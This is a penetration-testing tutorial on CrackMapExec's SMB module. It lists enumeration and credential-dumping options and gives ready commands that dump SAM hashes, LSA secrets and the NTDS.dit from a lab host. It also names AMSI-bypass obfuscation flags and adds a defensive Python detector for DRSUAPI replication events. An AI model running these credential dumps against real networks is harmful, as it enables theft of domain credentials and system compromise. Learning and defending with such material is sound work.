CrackMapExec SMB: Hacking Samba service

Mapping/Enumeration

Options for Mapping/Enumerating

  --shares              enumerate shares and access
  --sessions            enumerate active sessions
  --disks               enumerate disks
  --loggedon-users-filter LOGGEDON_USERS_FILTER
                        only search for a specific user, works with regex
  --loggedon-users      enumerate logged on users
  --users [USER]        enumerate domain users; if a user is specified then only its information is queried
  --groups [GROUP]      enumerate domain groups; if a group is specified then its members are enumerated
  --computers [COMPUTER]
                        enumerate computer accounts
  --local-groups [GROUP]
                        enumerate local groups; if a group is specified then its members are enumerated
  --pass-pol            dump password policy
  --rid-brute [MAX_RID]
                        enumerate users by brute-forcing RIDs (default: 4000)
  --wmi QUERY           issues the specified WMI query
  --wmi-namespace NAMESPACE
                        WMI namespace (default: root\cimv2)

Credential Gathering

Options for gathering credentials

  --enabled             Only dump enabled targets from DC
  --user USERNTDS       Dump selected user from DC
  --sam                 dump SAM hashes from target systems
  --lsa                 dump LSA secrets from target systems
  --ntds [{drsuapi,vss}]
                        dump the NTDS.dit from target DCs using the specified method (default: drsuapi)

Dumping SAM database

crackmapexec smb 192.168.1.15 -u 'Administrator' -p 'pop!lab' --sam

Dumping LSA Database

crackmapexec smb 192.168.1.15 -u 'Administrator' -p 'pop!lab' --lsa

Dumping NTDS - DRSUAPI

crackmapexec smb 192.168.1.15 -u 'Administrator' -p 'pop!lab' --ntds drsuapi

Dumping NTDS - VSS

crackmapexec smb 192.168.1.15 -u 'Administrator' -p 'pop!lab' --ntds vss
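The two --ntds commands above pull the directory database by asking a domain controller to replicate it (the drsuapi method) or by copying it from a shadow copy (vss). On the defensive side, the drsuapi method is the one that leaves a clear trace on the DC: a Security event 4662 showing an account exercising the DS-Replication-Get-Changes / DS-Replication-Get-Changes-All control access rights, which in a healthy domain only other domain controllers use. The following is an added example written for this page, not code from CrackMapExec or from PopLabSec; the extended-right GUIDs are the documented Active Directory values, while the log line format (key=value pairs separated by "|"), the field names and the sample events are constructed for illustration and do not mirror a real Windows export.

```python
from dataclasses import dataclass

# Documented Active Directory extended rights requested by DRSUAPI-based
# NTDS extraction (replication of the domain naming context). These GUIDs
# are real; they are not taken from the page above.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}


@dataclass(frozen=True)
class Finding:
    time: str
    account: str
    logged_by: str


def parse_event(line):
    """Parse one constructed '|'-separated key=value log line into a dict.

    This simplified layout is an assumption of the example; a real 4662 event
    carries the same information in its XML/EVTX fields."""
    fields = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def find_unexpected_replication(lines, dc_accounts):
    """Return a Finding for each 4662 event in which a replication control
    access right was exercised by an account that is not a known DC account."""
    expected = {a.lower() for a in dc_accounts}
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        # Properties holds the access mask and the GUIDs of the rights used.
        props = ev.get("Properties", "").lower()
        if not any(guid in props for guid in REPLICATION_RIGHTS):
            continue
        subject = ev.get("SubjectUserName", "")
        if subject.lower() in expected:
            continue  # DC-to-DC replication is normal traffic
        findings.append(Finding(ev.get("TimeCreated", ""), subject, ev.get("Computer", "")))
    return findings


# Constructed sample events: one normal DC replication, one replication by a
# user account, one unrelated 4662 and one non-4662 event.
SAMPLE_LOG = [
    "TimeCreated=2024-01-01T10:00:00|EventID=4662|Computer=DC01|SubjectUserName=DC02$"
    "|ObjectType=domainDNS|Properties=%%7688 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
    "TimeCreated=2024-01-01T10:05:00|EventID=4662|Computer=DC01|SubjectUserName=jdoe"
    "|ObjectType=domainDNS|Properties=%%7688 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
    "TimeCreated=2024-01-01T10:06:00|EventID=4662|Computer=DC01|SubjectUserName=jdoe"
    "|ObjectType=user|Properties=%%7688 00000000-0000-0000-0000-000000000000",
    "TimeCreated=2024-01-01T10:07:00|EventID=4624|Computer=DC01|SubjectUserName=jdoe",
]


if __name__ == "__main__":
    for f in find_unexpected_replication(SAMPLE_LOG, ["DC01$", "DC02$"]):
        print(f"{f.time} replication rights used by {f.account} (logged on {f.logged_by})")
```

The allow-list of DC machine accounts is the part that needs tuning per environment; Azure AD Connect service accounts and some backup products legitimately hold these rights and would otherwise be flagged on every sync. The vss method does not produce this event at all, since it copies the database file over SMB instead of replicating it, so it is better watched through share access and shadow-copy creation on the DC.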

Spidering

Options for spidering shares

  --spider SHARE        share to spider
  --spider-folder FOLDER
                        folder to spider (default: root share directory)
  --content             enable file content searching
  --exclude-dirs DIR_LIST
                        directories to exclude from spidering
  --pattern PATTERN [PATTERN ...]
                        pattern(s) to search for in folders, filenames and file content
  --regex REGEX [REGEX ...]
                        regex(s) to search for in folders, filenames and file content
  --depth DEPTH         max spider recursion depth (default: infinity & beyond)
  --only-files          only spider files

Powershell Obfuscation

Options for PowerShell script obfuscation

  --obfs                Obfuscate PowerShell scripts
  --amsi-bypass FILE    File with a custom AMSI bypass
  --clear-obfscripts    Clear all cached obfuscated PowerShell scripts

Reverse Shells

CrackMapExec Samba Modules

crackmapexec smb -L
